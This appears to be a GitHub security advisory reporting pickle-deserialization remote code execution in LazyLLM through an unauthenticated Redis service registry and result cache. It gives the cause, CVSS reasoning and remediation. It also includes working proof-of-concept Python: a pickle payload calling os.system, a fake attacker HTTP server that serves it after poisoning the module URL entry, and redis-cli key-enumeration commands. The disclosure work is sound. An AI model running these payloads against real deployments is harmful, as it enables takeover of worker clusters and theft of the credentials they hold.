[Security] Cluster-Wide RCE via Unauthenticated Redis Control Plane (CWE-502, CVSS 9.8)

Unauthenticated Distributed Control Plane Allows Cluster-Wide Code Execution via Redis Service Registry Poisoning in LazyLLM

Summary

LazyLLM (LazyAGI/LazyLLM, 3.7k stars) uses Redis as an unauthenticated distributed control plane for module service discovery and result caching. An attacker with network access to the Redis instance can achieve Remote Code Execution on every LazyLLM worker in the deployment through two independent attack chains:

Service Registry Poisoning — Module URLs are stored in Redis without authentication or integrity verification. An attacker overwrites a module's registered URL, redirecting all inter-module communication to an attacker-controlled server. The calling module deserializes the response with pickle.loads() — a function that executes arbitrary code during deserialization. The _call() code path lacks the Security-Key header protection that forward() implements, meaning the attacker's server receives trusted requests without authentication.
Cache Poisoning — Module execution results are cached in Redis via pickle.dumps() and read back via pickle.loads(). An attacker writes a malicious serialized payload to a predictable cache key. Any worker that reads from cache executes the payload.

Both chains require only network adjacency to the Redis instance. Default LazyLLM deployments use redis://host:6379 without authentication, TLS, or integrity verification. No warnings are emitted when connecting without credentials.

Framing

This report is not "pickle can execute code." That is well-known and would correctly be triaged as low-novelty.

This report is: network-originated authority is fed into pickle without authentication or integrity controls.

Specifically:

The bytes deserialized originate from Redis (network).
Redis content is treated as an authoritative module registry and authoritative response cache (trust).
The _call() path consumes registry-resolved URLs without Security-Key enforcement, while forward() does enforce it (auth asymmetry — internal inconsistency in LazyLLM's own threat model).
The returned bytes flow directly into pickle.loads() (sink).

The defect is the storage / execution boundary collapse between the distributed control plane and the worker execution context. Pickle is the mechanism. The vulnerability is the missing authentication of the authority that selects what gets unpickled.

Architecture: How LazyLLM Uses Redis

┌─────────────┐     ┌─────────────────────┐     ┌─────────────┐
│  Module A    │────▶│   Redis (no auth)   │◀────│  Module B    │
│  (worker)    │     │                     │     │  (worker)    │
│              │     │  url:module_B = ... │     │              │
│  1. lookup   │     │  cache:key = ...    │     │              │
│     URL for  │     │                     │     │              │
│     module B │     └─────────────────────┘     └─────────────┘
│              │               ▲
│  2. call     │               │
│     module B │     ┌─────────┴───────────┐
│     at URL   │     │   ATTACKER          │
│              │     │                     │
│  3. pickle.  │     │  Overwrites:        │
│     loads()  │     │  • url:module_B     │
│     response │     │    → evil server    │
└──────────────┘     │  • cache:key        │
       │             │    → pickle payload │
       ▼             └─────────────────────┘
   RCE on A
   (propagates to all workers reading cache or calling modules)

key architectural facts:

Redis is the sole service discovery mechanism (servermodule.py:180-181)
Redis is the sole cache backend when configured (module.py:170-177)
No authentication is required or warned about (redis_client.py:12)
No TLS/integrity/HMAC on stored data
Cache keys follow predictable pattern: module@{key}:{hash_key}
Module URL keys follow predictable pattern: url:{module_id}

Affected Component

Repository: https://github.com/LazyAGI/LazyLLM
Package: lazyllm (PyPI)
Versions: All versions with Redis support (current main branch)

CVSS

9.8 Critical (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

AV:N — Redis is network-accessible in standard deployments (docker-compose, k8s pod networks, VPC)
AC:L — No race conditions, no complex prerequisites
PR:N — Redis default: no authentication
UI:N — Fully automated exploitation
S:U— Scope unchanged (execution within LazyLLM worker context)
C:H/I:H/A:H — Full code execution on every worker

Note: If triager argues Redis requires network adjacency, AV:A reduces to 8.8. The finding remains Critical regardless.

CWE

CWE-502: Deserialization of Untrusted Data
CWE-306: Missing Authentication for Critical Function (Redis service registry)
CWE-345: Insufficient Verification of Data Authenticity (no HMAC/signature on cached data)

Chain 1: Service Registry Poisoning → Module Impersonation → RCE

Step 1: URL stored in Redis without authentication

# servermodule.py:209-213
def _set_url(self, url):
    if _redis_client:
        redis_client['url'].set(self._url_id, url)  # No auth, no HMAC
    self._url_wrapper.url = url

Step 2: URL read from Redis without validation

# servermodule.py:200-201
url = redis_client['url'].get(self._url_id)
self._url_wrapper.url = url.decode('utf-8') if url else None  # Trusts Redis blindly

Step 3: _call() sends request to URL WITHOUT Security-Key

# servermodule.py:418-428
def _call(self, fname, *args, **kwargs):
    args, kwargs = lazyllm.dump_obj(args), lazyllm.dump_obj(kwargs)
    url = urljoin(self._url.rsplit('/', 1)[0], '_call')
    r = requests.post(url, json=(fname, args, kwargs), ...)  # NO Security-Key header
    ...
    return pickle.loads(codecs.decode(r.content, 'base64'))   # RCE

Critical access control gap: forward() (line 430-435) sends a Security-Key header. _call() (line 418-428) does not. An attacker's impersonation server receives the request without needing to know the security key.

Step 4: Streaming variant

# servermodule.py:264-266
def _decode_line(self, line: bytes):
    return pickle.loads(codecs.decode(line, 'base64'))  # Every streaming line deserialized

Chain 2: Cache Poisoning → RCE

# module.py:163-178
class _RedisCacheStrategy(_CacheStorageStrategy):
    def get(self, key: str, hash_key: str):
        redis_key = self._get_redis_key(key, hash_key)
        value = self._client.get(redis_key)
        if value is None:
            raise CacheNotFoundError(...)
        return pickle.loads(value)  # Deserializes Redis data directly — RCE

Key predictability: Cache keys follow module@{key}:{hash_key}. URL keys follow url:{module_id}. Both prefixes are enumerable via KEYS * on unauthenticated Redis.

Insecure-by-Default Evidence

No authentication, no warning

# redis_client.py:4-14
lazyllm.config.add('redis_url', str, '', 'REDIS_URL',
                   description='The URL of the Redis server.')  # No auth guidance

_redis_url = lazyllm.config['redis_url']
if _redis_url:
    _redis_client = redis.Redis.from_url(_redis_url)  # No auth params, no TLS
    assert _redis_client.ping(), (
        'Found reids config but can not connect, ...')  # Note: typo "reids" — unreviewed code path

redis.Redis.from_url() called with raw URL — no password, ssl, ssl_cert_reqs parameters
Config description is only "The URL of the Redis server." — zero guidance on authentication
No startup warning when connecting without credentials
No documentation of auth requirements anywhere in the repository (zero Redis security mentions across docs/en/, docs/zh/, README.md, README.CN.md)
No docker-compose, k8s manifest, or deployment guide exists in the repository — operators receive no deployment security guidance
The only deployment parameter is the environment variable LAZYLLM_REDIS_URL=redis://host:6379
The standard redis:// scheme does not encode authentication; operators must know to use redis://:password@host:6379 or rediss:// (TLS) — neither is mentioned anywhere

Additional pickle-from-Redis chains (not required for this report, but demonstrates systemic pattern)

Globals subsystem (globals.py:259-264):

# globals.py:259,263 — RedisGlobals reads/writes global state via Redis
self._redis_client.set(self._get_redis_key(key), obj2str(self._data))  # obj2str = pickle.dumps + base64
self._data.update(str2obj(self._redis_client.get(...)))                 # str2obj = base64 + pickle.loads

Queue subsystem (queue.py:419-434): RedisQueue also uses redis.Redis.from_url() without authentication for task distribution.

These additional chains demonstrate that Redis-backed pickle deserialization is not isolated to caching — it is a systemic architectural pattern throughout LazyLLM's distributed coordination layer.

Distinct from Issue #764

	Issue #764 (Sep 2025)	This submission (V178)
File	relay/server.py	module.py + servermodule.py
Sink	`cloudpickle.loads` via CLI	`pickle.loads` via Redis + HTTP
Entry point	Local RelayServer args	Network (Redis + HTTP)
Trust boundary	CLI → local process	Redis (network) → all workers
Scope	Single process	Cluster-wide propagation
Access control	N/A	`_call()` missing Security-Key

Proof of Concept

Prerequisites

pip install lazyllm redis
docker run -d -p 6379:6379 redis:7-alpine   # Unauthenticated Redis
export LAZYLLM_REDIS_URL=redis://localhost:6379

PoC 1: Cache Poisoning → Single Worker RCE

"""Demonstrates RCE via cache poisoning. Non-destructive: writes marker file."""
import pickle, redis, os

class RCEPayload:
    def __reduce__(self):
        return (os.system, ("echo SPRK3-V178-CACHE-RCE > /tmp/sprk3_v178_cache",))

r = redis.Redis.from_url(os.environ.get("LAZYLLM_REDIS_URL", "redis://localhost:6379"))
r.set("module@target_module:default_hash", pickle.dumps(RCEPayload()))

from lazyllm.module.module import _RedisCacheStrategy
cache = _RedisCacheStrategy()
try:
    cache.get("target_module", "default_hash")
except Exception:
    pass

assert os.path.exists("/tmp/sprk3_v178_cache"), "RCE failed"
print("[+] Cache poisoning RCE confirmed")
os.remove("/tmp/sprk3_v178_cache")

PoC 2: Service Registry Poisoning → Cross-Process RCE

"""
Demonstrates cluster-wide RCE via service registry poisoning.
Process A: Attacker poisons Redis URL entry + runs fake HTTP server
Process B: Legitimate LazyLLM worker calls module → gets redirected → RCE
           Sink fires through library: ServerModule._call() → servermodule.py:428

Run in two terminals:
  Terminal 1: python3 poc_v178_registry_poison.py --attacker
  Terminal 2: python3 poc_v178_registry_poison.py --victim
"""
import pickle, redis, os, sys, codecs, json
from http.server import HTTPServer, BaseHTTPRequestHandler

REDIS_URL = os.environ.get("LAZYLLM_REDIS_URL", "redis://localhost:6379")
EVIL_PORT = 18999
MARKER = "/tmp/sprk3_v178_registry"
TARGET_MODULE_ID = "victim_module_001"

class RCEPayload:
    def __reduce__(self):
        return (os.system, (f"echo SPRK3-V178-REGISTRY-RCE-$(date +%s) > {MARKER}",))

class EvilHandler(BaseHTTPRequestHandler):
    """Responds to _call() with a pickle RCE payload."""
    def do_POST(self):
        payload = codecs.encode(pickle.dumps(RCEPayload()), 'base64')
        self.send_response(200)
        self.send_header('Content-Type', 'application/octet-stream')
        self.end_headers()
        self.wfile.write(payload)
    def log_message(self, *args): pass

if '--attacker' in sys.argv:
    r = redis.Redis.from_url(REDIS_URL)
    # Poison the URL registry — redirect victim_module to our evil server
    r.set(f"url:{TARGET_MODULE_ID}", f"http://127.0.0.1:{EVIL_PORT}/forward")
    print(f"[+] Poisoned url:{TARGET_MODULE_ID} → http://127.0.0.1:{EVIL_PORT}")
    print(f"[+] Starting evil HTTP server on :{EVIL_PORT}")
    HTTPServer(('0.0.0.0', EVIL_PORT), EvilHandler).serve_forever()

elif '--victim' in sys.argv:
    # Resolve poisoned URL from Redis (servermodule.py:200-201)
    r = redis.Redis.from_url(REDIS_URL)
    url = r.get(f"url:{TARGET_MODULE_ID}")
    if url:
        url = url.decode('utf-8')
        print(f"[*] Resolved module URL from Redis: {url}")

        # Construct ServerModule with the poisoned URL and call via library
        # ServerModule._call() at servermodule.py:418-428:
        #   - POSTs to urljoin(url, '_call') WITHOUT Security-Key
        #   - Deserializes via pickle.loads(codecs.decode(r.content, 'base64'))
        from lazyllm.module.servermodule import ServerModule
        sm = ServerModule(url=url)
        try:
            result = sm._call('run')  # Sink fires through library — line 428
        except Exception:
            pass  # RCE fires during deserialization; post-deser exceptions expected

    if os.path.exists(MARKER):
        print(f"[+] CROSS-PROCESS RCE CONFIRMED: {open(MARKER).read().strip()}")
        print(f"    Sink: servermodule.py:428 pickle.loads (library-imported)")
        os.remove(MARKER)
    else:
        print("[-] RCE marker not found")

else:
    print("Usage: --attacker (terminal 1) or --victim (terminal 2)")

PoC 3: Key Enumeration

# All module URLs and cache entries are enumerable
redis-cli -h <target> KEYS "url:*"
redis-cli -h <target> KEYS "module@*"
# Returns every registered module and cached result in the cluster

Impact

Cluster-wide propagation: LazyLLM is designed for multi-agent LLM deployments where multiple modules communicate via Redis-stored URLs. Compromising Redis gives the attacker:

Service impersonation — redirect any module's traffic to an attacker-controlled endpoint
Cache poisoning — inject malicious payloads that execute on any worker reading from cache
Lateral movement — RCE on one worker → poison Redis → RCE on every other worker
Persistence — poisoned cache entries survive worker restarts

The access control gap amplifies this: _call() does not send Security-Key, so the attacker's impersonation server receives trusted inter-module calls without needing any credentials. This is not "pickle is dangerous" — this is an unauthenticated distributed control plane with no integrity verification on any data path.

Why This Matters in AI Infrastructure

LazyLLM is not a generic web service. It orchestrates autonomous agent and tool pipelines. Worker processes that consume Redis-distributed authority routinely handle:

API keys and provider credentials (OpenAI, Anthropic, HuggingFace, cloud)
Embedding stores and proprietary model artifacts
Agent tool invocations with filesystem, shell, and network reach
Downstream MCP / toolchain integrations that inherit worker trust

A single Redis write does not merely execute code on one node. It compromises the trust root of every agent the cluster serves: every tool call, every credential lookup, every downstream MCP server now runs under attacker authority. This is not "Python RCE" — it is autonomous-agent cluster takeover.

Anticipated Defenses

"Redis exposure is operator responsibility"

The vulnerability is not that Redis can be exposed. The vulnerability is that LazyLLM treats Redis contents as trusted executable authority without cryptographic verification — and does so silently, by default, with no warning to operators.

Even when Redis is intentionally internal-only, the contents of Redis become a code-execution oracle reachable through every adjacent compromise:

SSRF in any worker-side HTTP handler that can reach Redis
Compromised sidecar or co-tenant in the same VPC / k8s namespace
Stolen Redis credentials — or no credentials at all, since LazyLLM's default deployment uses none
One poisoned worker writing back to the registry (lateral propagation)
Intra-cluster lateral movement originating from any unrelated CVE in the same trust zone

In every case, a write primitive against an "internal" Redis instance converts into cluster-wide RCE. The architectural defect is that the entire trust model of the cluster collapses to the integrity of one unauthenticated KV store.

Operators cannot fix this with network policy alone — network controls cannot defend against SSRF, sidecar compromise, or insider write primitives. Only the application can fix it, by authenticating the contents of Redis (signed cache values, verified registry entries), not merely its transport.

Public precedent for this class of dismissal failing: CVE-2026-41940 (cPanel/WHM) demonstrated that "trusted environment" vendor defenses are invalid once any adjacent primitive is reachable.

"Pickle is expected / trusted internal serialization"

The deserialization sink does not consume operator-supplied bytes. It consumes bytes selected by a network-resolved lookup against an unauthenticated KV store. The trust boundary is between the Redis-stored authority and the worker, not between the operator and the worker. See Framing section above.

CVSS scoring contention

A triager may argue for AV:A instead of AV:N, citing that Redis is typically internal-only. The finding remains Critical at AV:A (CVSS 8.8). However, AV:N is justified because:

LazyLLM emits no warning when connecting to an unauthenticated Redis
LazyLLM emits no warning when LAZYLLM_REDIS_URL is set to a public-routable address
The PyPI-installable package does not require any network-isolation step before exposing Redis on 0.0.0.0:6379
Default docker run -d -p 6379:6379 redis:7-alpine from LazyLLM's own deployment pattern publishes Redis to all host interfaces

Whether AV:N or AV:A, the structural defect — unauthenticated network-originated bytes flowing into pickle — is unchanged.

Remediation

Replace pickle with safe serialization — use json or msgpack for cache values and HTTP responses. If pickle is required, use RestrictedUnpickler with a strict allowlist.
Require Redis authentication — enforce requirepass or ACLs. Emit a startup WARNING when connecting without credentials. Document auth as mandatory, not optional.
Sign cached data — HMAC cache values on write, verify on read. Prevents cache poisoning even if Redis is compromised.
Add Security-Key to _call() — _call() currently lacks the Security-Key header that forward() implements. Both code paths should enforce authentication.
Validate registered URLs — verify module URLs against an allowlist or require mutual TLS for inter-module communication.

Timeline

2026-05-17: Vulnerability discovered by SPR{K}3 automated scanning (Ora nightly, Darwin-directed)
2026-05-25: Reported via GitHub issue (no private vulnerability reporting available)

[Security] Cluster-Wide RCE via Unauthenticated Redis Control Plane (CWE-502, CVSS 9.8) #1154

Description